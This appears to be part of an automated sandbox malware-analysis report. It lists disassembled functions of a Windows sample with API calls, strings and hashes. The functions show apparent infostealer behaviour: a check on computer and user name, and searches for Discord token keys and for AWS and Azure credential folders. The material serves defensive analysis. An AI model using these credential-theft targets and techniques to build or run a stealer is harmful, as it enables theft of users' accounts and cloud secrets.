                                                                                                                                                                                                                                                                                      • Instruction ID: ce61686c9be415db56d3220093c378b95acedfbe19f9b6f22c8a3ac929646854
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03516FB0308708AFD7209F26D849B9BB7A9FB1174AF10440BEC1397290DB7DD6C58A5D
                                                                                                                                                                                                                                                                                      Function 0041D0C0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 67stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00010000,?,0041DE17,?), ref: 0041D0C8
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00420BC0), ref: 0041D0FD
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.zip), ref: 0041D10F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.zoo), ref: 0041D11F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.arc), ref: 0041D12F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.lzh), ref: 0041D13F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.arj), ref: 0041D14F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.gz), ref: 0041D15F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.tgz), ref: 0041D16F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                                                                                                                      • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                                                      • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                                                      • Opcode ID: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                                      • Instruction ID: 393e261fe4cb7b69f2f042267bc96a23e416e0ea17d9edbe6cd76d0812bafa5d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C11BFB0B416227B9B325B745C48FEB6BE8AF15B40B990037F401E2171EB5CD8C286AD
                                                                                                                                                                                                                                                                                      Function 00401090 Relevance: 27.1, APIs: 18, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004010A8
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004010BA
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C52), ref: 004010CE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420F55), ref: 004010D6
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C48), ref: 004010DE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420FB1), ref: 004010E6
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C18), ref: 004010EE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C52), ref: 004010F6
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C50), ref: 004010FE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042035D,?,00420C50), ref: 00401106
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042060F,?,0042035D,?,00420C50), ref: 0040110E
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401116
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040111E
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401126
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040112E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00401137
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040114A
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401162
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$Heap$Process$AllocNamememsetstrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2002865342-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                                      • Instruction ID: 34afd6592ec8d0e6f1858942ae0d643bae2899fd03f8c159827732ad67307064
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8113CA57813283AE12132223DC7FBF159C9F92BD9F90012AFA04740C3AA9DDD4650FE
                                                                                                                                                                                                                                                                                      Function 004153A0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 252stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004153BA
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004153D0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415403
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\discord\), ref: 00415415
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415423
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Local State), ref: 0041542F
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 004078F0: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004078F0: lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                        • Part of subcall function 004078F0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411C00: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041552D,?,?,?), ref: 00411C0B
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,dQw4w9WgXcQ,?,?,?), ref: 00415535
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0041568B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00407790: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0040402F,00000000,?,?,?,?,?,?,?), ref: 0040779E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00407790: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?), ref: 004077CF
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0042150A), ref: 00415659
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,-0000000C), ref: 0041566B
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00421509), ref: 00415679
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$AllocFileLocal$FreeGloballstrcpylstrlenmemset$AttributesCloseCreateFolderHandlePathReadSize
                                                                                                                                                                                                                                                                                      • String ID: Local State$\discord\$dQw4w9WgXcQ
                                                                                                                                                                                                                                                                                      • API String ID: 3817223191-2067953968
                                                                                                                                                                                                                                                                                      • Opcode ID: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                                      • Instruction ID: 194099574810176e2e4ab308ae0ea84b9e6f71d167dd19124bd853461179d086
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EA17F71D007099BDB10EFB5CC85AEEB7B8FF48304F00455AF905A7152EB78AA85CBA5
                                                                                                                                                                                                                                                                                      Function 004166A0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 182stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004166BC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 004166DE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 004166ED
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00416772
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 00416794
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 004167A3
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00416828
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,0000001C), ref: 0041684A
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416859
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$memset$memcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                      • String ID: JB$\.IdentityService\$\.aws\$\.azure\
                                                                                                                                                                                                                                                                                      • API String ID: 3008122021-3834632163
                                                                                                                                                                                                                                                                                      • Opcode ID: 2a85a19b0b99fdcf43dd7720755f3efa47ca591d87611c61b5666c6d5bbdeba6
                                                                                                                                                                                                                                                                                      • Instruction ID: 9794ee9d7d5702d65981f79f32deebafb897a1fd212e6a52f5b9a62acbb35f13
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a85a19b0b99fdcf43dd7720755f3efa47ca591d87611c61b5666c6d5bbdeba6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF61BF71900748A7DB00EF75D9C69E97368BF98308F40925AFD056A143EB78EAC9C7D4
                                                                                                                                                                                                                                                                                      Function 0041D190 Relevance: 18.2, APIs: 12, Instructions: 179filetimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1A1
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1E5
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041D200
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041D21B
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041D224
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D235
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041D254
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D265
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D2E6
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D305
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D321
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D346
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
